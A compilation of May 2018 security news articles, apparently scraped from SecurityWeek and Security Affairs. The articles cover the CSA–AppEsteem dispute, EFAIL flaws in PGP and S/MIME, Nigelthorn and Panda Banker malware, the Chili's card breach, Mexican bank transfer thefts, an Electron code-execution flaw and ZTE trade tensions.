“As a 501(c)(6) nonprofit trade association,” writes the CSA on its website, “the CSA works to advance the interests of the software development community through the establishment and enforcement of guidelines, policies and technology tools that balance the software industry’s needs while preserving user choice and user control.”

In other words, it seeks to develop an app ecosphere where honest developers can be fairly recompensed, via monetization, for their labor. However, it provides very little information on its website. It does not, for example, list the members of the trade association, nor give any indication on how it will enforce its guidelines and policies on recalcitrant apps.

AppEsteem
Founded by Batchelder in 2016, AppEsteem is primarily an app certification organization – it certifies clean apps. However, since a carrot works best when supported by a stick, AppEsteem also calls out those apps it considers to be deceptive and therefore potentially harmful to users.

Batchelder hoped that the CSA and AppEsteem could work together (he was on the advisory board of the former and is president of the latter). The CSA could provide recommendations and industry support on classification criteria, and AppEsteem – at one step removed – could provide the enforcement element apparently missing in the CSA.

AppEsteem maintains what it calls the ‘deceptor list’; a list of apps that in its own judgement use deceptive means to increase their monetization potential. At the time of writing, there are more than 300 apps on the deceptor list. It also actively encourages AV firms to use this list in their own attempts at blocking PUPs.

There is a difficult balance. Deceptive app developers will object to being included on a public shaming list. Apps that get clean need to be removed in a timely fashion. New methods of deception need to be recognized and included in the bad behavior criteria.

It is, in short, a process wide open for criticism from app developers who are called out.

CSA criticizes AppEsteem
Criticism came last week from an unexpected source – from the CSA. On 10 May 2018, the CSA published a remarkably negative report on AppEsteem’s ‘deceptor’ program titled, CSA Review of AppEsteem Programs. It was, said the CSA, “triggered by a groundswell of complaints and expressions of concern received by the CSA from industry members regarding this program.”

The report is largely – although not entirely – negative. It raises some interesting points. The ‘groundswell of complaints’ is to be expected; particularly from the apps and the app developers called out for being deceptive.

However, concern over some other elements seem valid. AppEsteem does not seem keen to call out AV products, even when they appear to use ‘deceptive’ practices (consider, for example, the ease with which the user can download one product and find that McAfee has also been downloaded).

Furthermore, if certification is annual, a certified app could introduce deceptive practices immediately after certification that would go undetected (would effectively be allowed) for 12 months. “There is no more deceptive or risky behavior than that,” notes the report.

The CSA report makes four proposals. AppEsteem should: refocus efforts on certification; work with the CSA to devise consensus‐built ‘minbar’ criteria; balance violator identification and remediation; and embrace oversight and dispute resolution.

‘Oversight’ implies external management. Refocusing on certification implies abandoning the deceptor app listing. And ‘work with the CSA’ implies that AppEsteem should take its direction from the CSA. If not quite a power grab, the report attempts to neutralize the enforcement element of AppEsteem.

AppEsteem’s response
AppEsteem’s first response was for Batchelder to resign from the CSA advisory board. “I unable to figure out how to remain on the CSA Advisory Board in good conscience,” he wrote to the CSA. “Which sucks, as I’ve pushed for CSA to get operational and remain relevant, sent potential members its way, and worked hard to help it succeed. But being an advisor of an incorporator-status organization who is conducting a ‘confidential’ investigation into AppEsteem’s certification program without involving AppEsteem makes no sense at all.”

AppEsteem’s second response was to establish CleanApps.org; which is effectively an alternative to the CSA. “AppEsteem needs CSA,” comments one source who asked to be anonymous, “or at least some organization that can provide guidelines and some kind of oversight of what AppEsteem is doing… It seems that this new player is in fact a company created by Dennis trying to get rid of CSA.”

That partly makes sense. If AppEsteem cannot work with the CSA, it must find a similar organization it can work with. “After I disengaged from CSA, Batchelder told SecurityWeek, “we realized that AppEsteem had to find a way to get the vendor voice and to reassure them that we’re doing things fairly (the stuff we had hoped CSA would do). So, I incorporated CleanApps.org and recruited its first board from some of our customers (I know, it’s like a soap opera), and then resigned/handed it over once the board launched. Our goal is that once CleanApps.org launches, we’ll give them insight into our operations.”

To the CSA, he wrote in February, “I wanted to let you know that we have determined that it’s in best interests of both ourselves, our customers, and the vendor community if we had oversight and a ‘voice’ specifically representing the vendor community… We won’t become a member or hold any position in CleanApps.org; they will self-govern.” (He has since made it clear that he does not mean ‘oversight’ in any controlling manner.)

AppEsteem’s position seems to be that the app ecosphere requires three organizations: AppEsteem to enforce good behavior among the app developers; the CSA to represent the market in which apps operate; and CleanApps to represent the apps and app developers.

But it is clearly concerned over the current relevance of the CSA. “I think the biggest hole with CSA,” Batchelder told SecurityWeek, “is that they never finished forming: it’s still just… as the only member, and what we felt was that when [that member] had an issue with us, CSA went negative… it’s problematic to us that they’re not formed after four years.”

If AppEsteem needs something like the CSA to be effective, the CSA needs something like AppEsteem to be relevant.

AppEsteem’s third response is a short blog posted on the same day as CSA published its report – Thursday, 10 May 2018. There is no indication of any rapprochement with the CSA. “But we also want to be clear,” writes the author: “if you think it’s fine to treat consumers as exploitable targets for deceptive and aggressive software, we totally understand your desire for us to leave you alone. We strongly suggest you either get on board or find something else to do with your time, as we’re going to continue to tune our Deceptor program to find even more effective ways to disrupt your ability to hurt consumers.”

The way forward
It is hard to see how any outright deceptive app produced by developers simply out to get as much money as possible will ever be persuaded by force of argument alone to abandon deceptive practices. This seems to be the approach of the CSA; and it appears – on the evidence of its website – to have achieved little in its three to four years of existence.

Indeed, the one and only report the CSA has published is the report criticizing AppEsteem. Before that, the previous publication seems to be ‘update #7’, probably written around March 2016.

If the CSA has achieved anything, it is not saying so. At the very least, it could be urged to be more transparent in its operations and achievements – even a list of members would be useful.

Meantime, if the new CleanApps.org gathers pace and support, the CSA itself will become increasingly irrelevant in the battle against deceptive apps; that is, potentially unwanted programs.


Security Gaps Remain as OT, IT Converge
14.5.2018 securityweek IT 

The accelerating digitization of business, driven by compelling commercial arguments, is driving the integration of new information technology (IT) networks with older operational technology (OT) networks. This is introducing new security risks to old technology and old technology practices -- and where the OT is driving a critical manufacturing plant, the new risk is from nation-state actors as well as traditional cyber criminals.

The good news is that many organizations understand the risks and are actively engaged in mitigating those risks. The bad news is the risk mitigation process is far from complete.

Network and content security firm Fortinet commissioned Forrester Consulting to survey the state of converging IT / OT network security. In an associated blog, Fortinet's senior director of product marketing, Peter Newton, explains the cultural difference between IT and OT security: "IT teams have a tendency to just want to throw security technology at the network and call it good. But these networks can be very different, and what works well in one environment can have devastating consequences in the other. For example, an error that opens a port on a switch can have a very different result from one that opens a valve on a boiler."

In January 2018, Forrester queried 429 global decision-makers responsible for the security of their organization’s critical infrastructure from a range of different industries, asking about their IT / OT convergence (PDF) and the security challenges being faced. The result suggests that awareness is high, and steps are in progress (SCADA / ICS security spending is planned to increase by 77%) -- but there is much yet to be done (45% of respondents do not used privileged account management (PAM) for their administrators).

The last issue is particularly relevant given the extent to which converged networks are being opened to third-party suppliers. Sixty-four percent of the companies surveyed provide either complete or high-level access to their SCADA / ICS, including to outsourced suppliers, business partners and government agencies. This seems to be changing, with respondents taking steps to reduce the number of vendors used to provide security functions for IPS, NAC and IoT.

"The number of organizations that now rely on a single vendor to provide a full range of outsourced solutions has jumped from 38% to 47% between 2016 and 2018," comments John Maddison, Fortinet's SVP products and solutions, in a separate blog post.

Coupled with the lack of a PAM solution, the report highlights that 45% of the respondents do not use role-based access control, which provides openings for insider threats. Indeed, internal hackers are considered a greater threat (77% of respondents are extremely or very concerned) than external hackers (70%). The greatest concern is reserved for malware at 77%, with leakage of sensitive or confidential data at 70%.

The security threat is not hypothetical. While there have already been severaal highly-publicized incidents (such as the Ukraine power outages in December 2015, and the U.S. water utility incident in March 2016) the majority of respondents have also experienced a breach. Fifty-six percent of organizations using SCADA / ICS reported a breach in the past year, and only 11% indicated they have never been breached.

SCADA / ICS breaches can have serious consequences. "Sixty-three percent of organizations say the safety of their employees was highly or critically impacted by a SCADA / ICS security breach," notes the report. "Another 58% report major impacts to their organization’s financial stability, and 63% note a serious drag on their ability to operate at a sufficient level."

Solutions to the growing SCADA / ICS risk exist, but require a new approach beyond the traditional IT security approach. IT and OT teams speak different languages for security, comments Newton. Existing OT systems may be running on an obsolete operating system on hardware that is ten or more years old. "But that may be because it only has one job," he explains: "for example, monitoring a thermostat and then throwing a switch when it reaches a critical temperature. That doesn’t require the latest technology, and if it is doing the job it was designed to do, then there is no reason to change it. But because so many of these systems run on proprietary software and use delicate instrumentation, even something as benign as scanning a device for malware can cause it to malfunction."

Solutions do exist, but must be chosen with care. "When considering a security vendor for their SCADA / ICS environments," suggests Newton, "the ability to meet compliance standards and provide end-to-end solutions, along with a reputation for reliability are the most important attributes [the respondents] look for. These organizations are looking for solutions from a variety of vendors, from systems integrators to security manufacturers."


Hackers Divert Funds From Mexico Banks, Amount Unclear: Official
14.5.2018 securityweek Hacking 

Hackers have stolen an unknown amount of money from banks in Mexico in a series of cyber attacks on the country's interbank payments system, an official said Monday.

At least five attacks on the Mexican central bank's Interbank Electronic Payments System (SPEI) were carried out in April and May, said Lorenza Martinez, director general of the corporate payments and services system at the central bank.

"Some transactions were introduced that were not recognized by the issuing bank," she told Radio Centro.

"In some cases these transfers made it through to the destination bank and were withdrawn in cash."

She declined to reveal which banks were targeted.

Some Mexican media outlets have put the amount stolen at 400 million pesos ($20.4 million), but Martinez denied those reports.

"The amount is currently being analyzed. Some of the transfers were stopped, and the funds are currently being returned," she said.

She said the money stolen belonged to the banks themselves and that clients' funds were never affected.

The interbank payments system allows banks to make real-time transfers to each other.

They connect via their own computer systems or an external provider -- the point where the attacks appear to have taken place, Martinez said.

After the attacks were detected, banks switched to a slower but more secure method.

No new attacks have been registered since.


Researchers disclosed details of EFAIL attacks on in PGP and S/MIME tools. Experts believe claims are overblown
14.5.2018 securityaffairs 
Attack

EFAIL attacks – Researchers found critical vulnerabilities in PGP and S/MIME Tools, immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.
A few hours ago, I reported the news that security researchers from three universities in Germany and Belgium have found critical vulnerabilities in PGP and S/MIME Tools that could be exploited by attackers to read emails encrypted with OpenPGP and S/MIME.

Pretty Good Privacy is the open source end-to-end encryption standard used to encrypt emails, while S/MIME, Secure/Multipurpose Internet Mail Extensions, is an asymmetric cryptography-based technology that allows users to send digitally signed and encrypted emails.

The existence of the vulnerabilities was also confirmed by the researchers at the Electronic Frontier Foundation (EFF) that recommended users to uninstall Pretty Good Privacy and S/MIME applications until the issued are fixed.

The experts initially planned on disclosing details on Tuesday morning, but they later decided to publicly share their findings due to wrong information circulating online.

The experts disclosed two variant of the attack dubbed EFAIL, in both scenarios hackers need to be in a position of intercepting encrypted emails, for example hacking the target email account or conducting a man-in-the-middle (MitM) attack.

“The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.” reads the blog post published by the researchers.

“To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.”

The attacker manipulates the ciphertext in the protected emails and sends a modified message containing custom HTML code to the original receiver or sender.

EFAIL attack

The first attack technique, dubbed direct exfiltration attack, exploits vulnerabilities in the Apple Mail (for iOS and macOS) and Mozilla Thunderbird email clients. The attacker sends the targeted user a specially crafted multipart email with three HTML body parts. When the victim’s client will open and decrypt the email, the attacker’s code causes the application to send the text to a server controlled by the attacker.

The direct exfiltration technique could be used against both PGP and S/MIME.

The second technique, named a CBC/CFB gadget attack, exploits vulnerabilities in the OpenPGP (CVE-2017-17688) and S/MIME (CVE-2017-17689). In the attack scenario, the victim needs to be in possession of their private key, if the private key has been lost the techniques cannot be used.

“He then sends the manipulated email to one of the original receivers, or to the original sender. He may hide this by choosing new FROM, DATE and SUBJECT fields, and he may hide the manipulated ciphertext by hiding it within an invisible iFrame. Thus the attack mail the victim receives looks unsuspicious” reads the research paper published by the experts.

“Once he opens the email in his client, the manipulated ciphertext will be decrypted – first the private key of the victim is used to decrypt the session key s, and then this session key is used to decrypt the manipulated ciphertext c. The decrypted plaintext now contains, due to the manipulations, an exfiltration channel (e.g., an HTML hyperlink) that will send the decrypted plaintext as a whole or in parts to the attacker,” researchers wrote in their paper on EFAIL.

The CBC/CFB gadget attack is effective against PGP, researchers observed a success rate of 33%.

Test results show the EFAIL attack work against 25 of 35 tested S/MIME email clients and 10 of 28 tested OpenPGP clients.

“Our analysis shows that EFAIL plaintext exfiltration channels exist for 25 of the 35 tested S/MIME email clients and 10 of the 28 tested OpenPGP email clients.” states the blog post.

“While it is necessary to change the OpenPGP and S/MIME standards to reliably fix these vulnerabilities, Apple Mail, iOS Mail and Mozilla Thunderbird had even more severe implementation flaws allowing direct exfiltration of the plaintext that is technically very easy to execute.”

Many security experts downplayed the importance of the EFAIL attack techniques explaining that the attacks work only against buggy email clients.

Robert J. Hansen
@robertjhansen
6h
Replying to @robertjhansen
GnuPG, and/or an email plugin which didn't handle the warning correctly.

We made three statements about the Efail attack at the beginning. We're
going to repeat them here and give a little explanation. Now that we've
explained the situation, we're confident you'll concur in 12/

Robert J. Hansen
@robertjhansen
our judgment.

1. This paper is misnamed. It's not an attack on OpenPGP. It's an
attack on broken email clients that ignore GnuPG's warnings and do silly
things after being warned. 13/

2:38 PM - May 14, 2018
32
20 people are talking about this
Twitter Ads info and privacy

Robert J. Hansen
@robertjhansen
6h
Replying to @robertjhansen
2. This attack targets buggy email clients. Correct use of the MDC
completely prevents this attack. GnuPG has had MDC support since the
summer of 2000. 14/

Robert J. Hansen
@robertjhansen
3. The authors made a list of buggy email clients. It's worth looking
over their list of email clients (found at the very end) to see if yours
is vulnerable. But be careful, because it may not be accurate -- for
example, Mailpile says they're not vulnerable, but the paper 15/

2:38 PM - May 14, 2018
14
See Robert J. Hansen's other Tweets
Twitter Ads info and privacy

ProtonMail

@ProtonMail
While we think that stories claiming "PGP is vulnerable" are inaccurate (since the issue was reported in 2001 and is a client side problem), we do take the Efail bug seriously. The researchers have said ProtonMail is not impacted. We are performing independent confirmation also.

3:36 PM - May 14, 2018
302
123 people are talking about this
Twitter Ads info and privacy

ProtonMail

@ProtonMail
ProtonMail is safe against the efail PGP vulnerability. The real vulnerability is implementation errors in various PGP clients. PGP (and OpenPGP) is fine. Any service that uses our @openpgpjs library is also safe as long the default settings aren't changed.

1:55 PM - May 14, 2018
623
462 people are talking about this
Twitter Ads info and privacy
EFAIL attacks can be mitigated by not using HTML for incoming emails, patches released by email client developers could prevent the attacks.


Nigelthorn malware infected over 100,000 systems abusing Chrome extensions
14.5.2018 securityaffairs 
Virus

The Nigelthorn malware has already infected over 100,000 systems in 100 countries by abusing a Google Chrome extension called Nigelify.
A new strain of malware, dubbed Nigelthorn malware because it abuses a Google Chrome extension called Nigelify, has already infected over 100,000 systems in 100 countries, most of them in the Philippines, Venezuela, and Ecuador (Over 75%).

The new malware family is capable of credential theft, cryptomining, click fraud, and other malicious activities.

According to the experts, the threat actor behind this campaign has been active since at least March 2018.

The Nigelthorn malware is spreading through links on Facebook, victims are redirected to a fake YouTube page that asks them to download and install a Chrome extension to play the video. Once the victims accepted the installation, the malicious extension will be added to their browser.

“Radware has dubbed the malware “Nigelthorn” since the original Nigelify application replaces pictures to “Nigel Thornberry” and is responsible for a large portion of the observed infections.” reads the analysis published by Radware.

“The malware redirects victims to a fake YouTube page and asks the user to install a Chrome extension to play the video.”


The malware was specifically developed to target both Windows and Linux machines using the Chrome browser.

When a victim clicks on “Add Extension” is redirected to a Bitly URL from which they will be redirected to Facebook in the attempt to provide the credentials for his account.

In order to bypass Google Application validation tools, the threat actors used copycat versions of legitimate extensions and injected a short, obfuscated malicious script into them.

“To date, Radware’s research group has observed seven of these malicious extensions, of which it appears four have been identified and blocked by Google’s security algorithms. Nigelify and PwnerLike remain active,” reads the analysis.

After the malicious extension is installed, a JavaScript is executed to start the attack by downloading the malware configuration from the command and control (C&C) server, after which a set of requests is deployed.

The Nigelthorn malware is able to steal Facebook login credentials and Instagram cookies. The malware also redirects users to a Facebook API to generate an access token that is then sent to the Command and Control servers.

The malware propagated by using the stolen credentials, it sends the malicious link to the victim’s network either via messages in Facebook Messenger, or via a new post that includes tags for up to 50 contacts.

The Nigelthorn malware also downloads a cryptomining tool to the victim’s computer.

“The attackers are using a publicly available browser-mining tool to get the infected machines to start mining cryptocurrencies.” states Radware. “The JavaScript code is downloaded from external sites that the group controls and contains the mining pool. Radware observed that in the last several days the group was trying to mine three different coins (Monero, Bytecoin and Electroneum) that are all based on the “CryptoNight” algorithm that allows mining via any CPU.”

The malicious code uses numerous techniques to gain persistence on the infected system, such as closing the extensions tab if the user attempts to access it, or downloading URI Regex from the C&C and blocking users from accessing Facebook and Chrome cleanup tools or from making edits, deleting posts, and posting comments.

Experts also described a YouTube fraud, the YouTube plugin is downloaded and executed, after which the malware attempts to access the URI “/php3/youtube.php” on the C&C to receive commands to watch, like, or comment on a video, or to subscribe to the page. These actions are likely an attempt to receive payments from YouTube.

“As this malware spreads, the group will continue to try to identify new ways to utilize the stolen assets. Such groups continuously create new malware and mutations to bypass security controls. Radware recommends individuals and organizations update their current password and only download applications from trusted sources,” concludes Radware.


Chili’s restaurant chain is the last victim of a Payment Card Breach
14.5.2018 securityaffairs  Incindent

Brinker International warns customers who recently paid with their payment card at a Chili’s restaurant may have had their financial data stolen by crooks.
On May 11, Brinker International company, which operates more than 1,600 Chili’s and Maggiano’s restaurants across 31 countries worldwide, announced to have suffered a data breach.

“This notice is to make you aware that some Chili’s restaurants have been impacted by a data incident, which may have resulted in unauthorized access or acquisition of your payment card data, and to provide you information on steps you can take to protect yourself and minimize the possibility of misuse of your information.” reads the notice issued by Brinker.

The company issued a notice to warn people that recently used their payment cards at a Chili’s restaurant of a possible data breach, according to the initial investigation crooks infected payment systems with a malware.

Chiliâ??s restaurant

Cybercriminals siphoned payment card data from some Chili’s restaurants between March and April 2018. The malicious code was used to harvest credit and debit card numbers as well as cardholder names from PoS systems in the restaurants.

“Based on the details of the issue currently uncovered, we believe that malware was used to gather payment card information including credit or debit card numbers as well as cardholder names from our payment-related systems for in-restaurant purchases at certain Chili’s restaurants. Currently, we believe the data incident was limited to between March – April 2018; however, we continue to assess the scope of the incident.” continues the note.

“Chili’s does not collect certain personal information (such as social security number, full date of birth, or federal or state identification number) from Guests. Therefore, this personal information was not compromised.”

The company highlighted that it does not collect social security numbers, dates of birth or other personal information, it immediately activated the incident response plan and is currently working with third-party forensic experts to investigate the incident.

Brinker advised customers to monitor their bank and credit card statements for any suspicious activity. Customers can visit a web page set up by the company to receive more information on the data breach and updates on this event.

Major restaurant chains are a privileged target for cybercriminals, last year many companies suffered a data breach including Amazon’s Whole Foods Market, Arby’s, and Chipotle.


Critical Flaws in PGP and S/MIME Tools – Immediately disable tools that automatically decrypt PGP-encrypted email
14.5.2018 securityaffairs
Attack

Researchers found critical vulnerabilities in PGP and S/MIME Tools, immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.
If you are one of the users of the email encryption tools Pretty Good Privacy and S/MIME there is an important warning for you.

A group of European security expert has discovered a set of critical vulnerabilities in PGP and S/Mime encryption tools that could reveal your encrypted emails in plain text, also the ones you sent in the past.

Pretty Good Privacy is the open source end-to-end encryption standard used to encrypt emails, while S/MIME, Secure/Multipurpose Internet Mail Extensions, is an asymmetric cryptography-based technology that allows users to send digitally signed and encrypted emails.

Sebastian Schinzel, a professor of Computer Security at the Münster University of Applied Sciences, warned the Pretty Good Privacy (PGP) might actually allow Pretty Grievous P0wnage due to vulnerabilities and the worst news is that currently there are no reliable fixes.

Sebastian Schinzel
@seecurity
13h
We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. #efail 1/4

Sebastian Schinzel
@seecurity
There are currently no reliable fixes for the vulnerability. If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now. Also read @EFF’s blog post on this issue: https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilities-require-you-take-action-now … #efail 2/4

8:00 AM - May 14, 2018

Attention PGP Users: New Vulnerabilities Require You To Take Action Now
A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can...

eff.org
321
483 people are talking about this
Twitter Ads info and privacy
The existence of the vulnerabilities was also confirmed by the researchers at the Electronic Frontier Foundation (EFF), the organization also recommended users to uninstall Pretty Good Privacy and S/MIME applications until the issued are fixed.

“A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.” reads the blog post published by the EFF.

“Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.”

PGP and S/MIME Tools, hacking encryption

The EFF also provided links to guides on how to temporarily disable PGP plug-ins in for Thunderbird with Enigmail, Apple Mail with GPGTools, and Outlook with Gpg4win.
“Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email,” states the advisory.

Schnizel will disclose full details on Tuesday morning at 0700 UTC.


PANDA Banker malware used in several campaigns aimed at banks, cryptocurrency exchanges and social media
14.5.2018 securityaffairs
Virus  Cryptocurrency

Security firm F5 detailed recently discovered campaigns leveraging the Panda Banker malware to target financial institution, the largest one aimed the banks in the US.
Researchers at security firm F5 recently detected several campaigns leveraging the Panda Banker malware to target financial institution, the largest one aimed the banks in the US.

In March, security researchers at Arbor Networks discovered a threat actor targeting financial institutions in Japan using the latest variant of the Panda Banker banking malware (aka Zeus Panda, PandaBot).

Panda Banker was first spotted in 2016 by Fox-IT, it borrows code from the Zeus banking Trojan and is sold as a kit on underground forums, In November 2017, threat actors behind the Zeus Panda banking Trojan leveraged black Search Engine Optimization (SEO) to propose malicious links in the search results. Crooks were focused on financial-related keyword queries.

The main feature of the Panda Banker is the stealing of credentials and account numbers, it is able to steal money from victims by implementing “man in the browser” attack.

According to F5, the malware continues to target Japanese institutions and it is also targeting users in the United States, Canada, and Latin America.

“We analyzed four campaigns that were active between February and May of 2018. The three May campaigns are still active at the time of this writing. Two of the four campaigns are acting from the same botnet version but have different targets and different command and control (C&C) servers.” reads the analysis published by F5.

“Panda is still primarily focused on targeting global financial services, but following the worldwide cryptocurrency hype, it has expanded its targets to online cryptocurrency exchanges and brokerage services. Social media, search, email, and adult sites are also being targeted by Panda.”

Experts observed a spike in the activity associated with the malware in February when the malicious code was used to target financial services and cryptocurrency sites in Italy with screenshots rather than webinjects. With this technique, the attackers are able to spy on user interaction at cryptocurrency accounts.

“The Panda configuration we analyzed from February was marked as botnet “onore2.” This campaign leverage the same attack techniques as previously described, and it is able to keylog popular web browsers and VNC in order to hijack user interaction session and steal personal information.” states the analysis.

Panda-banker-by-industry

In May, the experts monitored three different Panda Banker campaigns each focused on different countries.

One of them, tracked by F5 as botnet “2.6.8,” had targets in 8 industries in North America, most of the targets (78%) are US financial organizations.

“This campaign is also targeting major social media platforms like Facebook and Instagram, as well as messaging apps like Skype, and entertainment platforms like Youtube. Additionally, Panda is targeting Microsoft.com, bing.com, and msn.com,” says F5.

Experts discovered that the same botnet 2.6.8 is also targeting Japanese financials as well.

Comparison of the two botnet configurations reveals that when Zeus.Panda is targeting Japan, the authors removed the Content Security Policy (CSP) headers: remove_csp – 1 : The CSP header is a security standard for preventing cross-site scripting (XSS), clickjacking and other code injection attacks that could execute malicious code from an otherwise trusted site.

This last campaign also targets Amazon, YouTube, Microsoft.com, Live.com, Yahoo.com, and Google.com, Facebook, Twitter, and a couple of two sites.

The third campaign aimed at financial institutions in Latin America, most of them in Argentina, Columbia, and Ecuador, The same campaign also targeted social media, search, email, entertainment, and tech provider as the other attacks.

“This act of simultaneous campaigns targeting several regions around the world and industries indicates these are highly active threat actors, and we expect their efforts to continue with multiple new campaigns coming out as their current efforts are discovered and taken down,” F5 concludes.


Code Execution Flaw in Electron Framework Could Affect Many Apps
14.5.2018 securityweek
Vulnerebility

GitHub’s open source development framework Electron is affected by a vulnerability that can allow remote code execution. Technical details and proof-of-concept (PoC) code were made public last week by the researcher who discovered the issue.

Electron allows developers to create cross-platform desktop applications using HTML, CSS and JavaScript. The framework has been used in the development of hundreds of applications, including Skype, GitHub Desktop, Slack, WhatsApp, Signal, Discord and WordPress.com.

Trustwave researcher Brendan Scarvell discovered earlier this year that certain applications created with Electron may allow remote code execution if they are affected by cross-site scripting (XSS) vulnerabilities and configured in a specific way.

“Electron applications are essentially web apps, which means they're susceptible to cross-site scripting attacks through failure to correctly sanitize user-supplied input. A default Electron application includes access to not only its own APIs, but also includes access to all of Node.js' built in modules. This makes XSS particularly dangerous, as an attacker's payload can allow do some nasty things such as require in the child_process module and execute system commands on the client-side,” the researcher explained in a blog post. “You can remove access to Node.js by passing nodeIntegration: false into your application's webPreferences.”

Scarvell found that if an application is affected by an XSS flaw and certain options have not been manually set in the app’s webPreferences, an attacker can re-enable nodeIntegration during runtime and execute system commands.

The vulnerability, tracked as CVE-2018-1000136, was patched by Electron developers in March with the release of versions 1.7.13, 1.8.4, and 2.0.0-beta.4. The security hole can also be mitigated by adding a piece of code provided by Electron.

The Signal messaging app and the Brave web browser are reportedly not impacted by this flaw.


Chili's Restaurants Hit by Payment Card Breach
14.5.2018 securityweek Incindent

People who recently paid with their credit or debit card at a Chili’s restaurant may have had their information stolen by cybercriminals, according to Dallas-based Brinker International.

Brinker, which operates more than 1,600 Chili’s and Maggiano’s restaurants across 31 countries, issued a notice shortly after the data breach was discovered on May 11.

While the investigation is ongoing, initial evidence suggests that a piece of malware collected payment card data from some Chili’s restaurants in March and April 2018. The malware apparently harvested credit and debit card numbers as well as cardholder names from payment systems used for in-restaurant purchases.

Brinker noted that it does not collect social security numbers, dates of birth or other personal information.

“We immediately activated our response plan upon learning of this incident,” the company stated. “We are working with third-party forensic experts to conduct an investigation to determine the details of what happened.”

Brinker believes the incident has been contained, but advised customers to keep an eye on their bank and credit card statements for any suspicious activity.The company has set up a web page where it will provide updates on this incident.

Chili’s is not the only major restaurant chain to disclose a payment card breach this year. RMH Franchise Holdings revealed in March that malware had been found on point-of-sale (PoS) systems at over 160 Applebee’s restaurants it operates as a franchise.

Several major restaurant chains disclosed payment card breaches last year, including Arby’s, Chipotle, Sonic Drive-In, and Shoney’s. Amazon's Whole Foods Marketalso informed customers that taprooms and full table-service restaurants at nearly 100 locations were hit by a breach.


ZTE Woes Loom as US-China Trade Tensions Rise
13.5.2018 securityweek BigBrothers

With a major Chinese smartphone maker on the rocks following US sanctions, the trade spat between Washington and Beijing appears to be taking a turn for the worse for tech firms in the two global economic powerhouses.

Chinese telecom giant ZTE said in the past week its major operations had "ceased" following last month's US ban on American sales of critical technology to the company, raising the possibility of its collapse.

ZTE depended on American chips and other components, and is unable to continue operating without key supplies.

US officials imposed the ban last month, saying ZTE failed to abide by an agreement to stop selling to Iran and North Korea.

While the ZTE case has a specific legal basis, the ban comes as US-China trade relations have hit a rough patch, amid an intense rivalry for supremacy in key technology fields such as artificial intelligence and 5G, the next-generation wireless systems in the works.

The US administration has barred military and government employees from using smartphones from ZTE and fellow Chinese maker Huawei.

President Donald Trump earlier this year blocked a deal that would have allowed a Singapore-based firm to acquire US chipmaker Qualcomm, claiming it would enable Huawei to set the pace the global rollout of 5G technology.

The trade troubles threaten a technology sector that is increasingly intertwined with major players in the United States and China.

"It's going to disrupt procurement, supply lines, it will affect a lot of companies in various ways," said one technology industry executive who asked to remain anonymous.

"Nobody's panicking yet but people are nervous and watching."

Accelerating independence drive

James Lewis, a technology specialist with the Center for Strategic and International Studies, said the tensions are likely to prompt China to step up efforts to disconnect from the US tech sector.

"The biggest impact will be to accelerate China's desire to have non-American sources of supply," Lewis said.

"They don't want to be held hostage" to US tech firms.

Lewis said the technology trade tensions stem from genuine concerns in Washington that critical 5G and related telecom technologies will be dominated by China-based Huawei.

"Huawei is trying to become the telecom company for the world," Lewis said. "They are the strongest across the board in 5G... This is a place where China's model of capital works better."

Lewis said that with companies like Huawei and ZTE facing obstacles in the United States, "American companies see the opening to the China market closing more rapidly than they might have thought."

In the near-term, Lewis said, Chinese firms still depend on some elements of US technology, but they are moving to become more autonomous.

Still, he said Washington has some justified national security concerns about preventing Huawei from becoming too dominant.

Increasing reliance on Chinese telecom equipment would give Beijing an edge in global surveillance and intelligence, he said.

"The equipment is always calling home," he said. "If you control the updater and the infrastructure you have an immense advantage."

Huawei has long disputed any links to the Chinese government, while noting that its infrastructure and computing products are used in 170 countries.

A statement from Huawei said its products "meet the highest standards of security, privacy and engineering in every country we operate," adding that "no government has ever asked us to compromise the security or integrity of any of our networks or devices."

Victory dance?

Matt Gold, an adjunct Fordham University law professor and former deputy assistant US trade representative, said the latest problems over ZTE are unlikely to worsen relations because "the current situation is about as bad as it can get without a complete freefall."

Gold said that while the president has authority under domestic law to impose sanctions for national security reasons, such moves may violate international trade rules and laws if the actions come in the absence of war or other emergency.

In the current climate, Gold said, US lawmakers appear inclined to impose stricter limits on Chinese investments in US tech firms as a way to stay ahead of China.

The Trump administration, according to Gold, could take a risky hard-line path of imposing new tariffs and restrictions on technology, but is more likely to seek to negotiate some concessions.

He said it is probable that "after many months of negotiations, China will give the US a series of concessions, including some things they had already agreed to and some of which were promises they had given before."

And all that, Gold said, "will be face saving for President Trump, who will declare a great victory."


Nigelthorn Malware Infects Over 100,000 Systems
13.5.2018 securityweek
Virus

A newly discovered malware family capable of credential theft, cryptomining, click fraud, and other nefarious actions has already infected over 100,000 computers, Radware reveals.

Dubbed Nigelthorn because it abuses a Google Chrome extension called Nigelify, the malware is propagating via socially-engineered links on Facebook. The group behind the campaign has been active since at least March 2018 and has already managed to infect users in 100 countries.

Victims are redirected to a fake YouTube page that asks them to install a Chrome extension to play the video. Once they accept the installation, the malicious extension is added to their browser, and the machine is enrolled in the botnet.

Impacting both Windows and Linux machines, the malware depends on Chrome, which suggests that those who do not use this browser are not at risk, the security researchers point out.

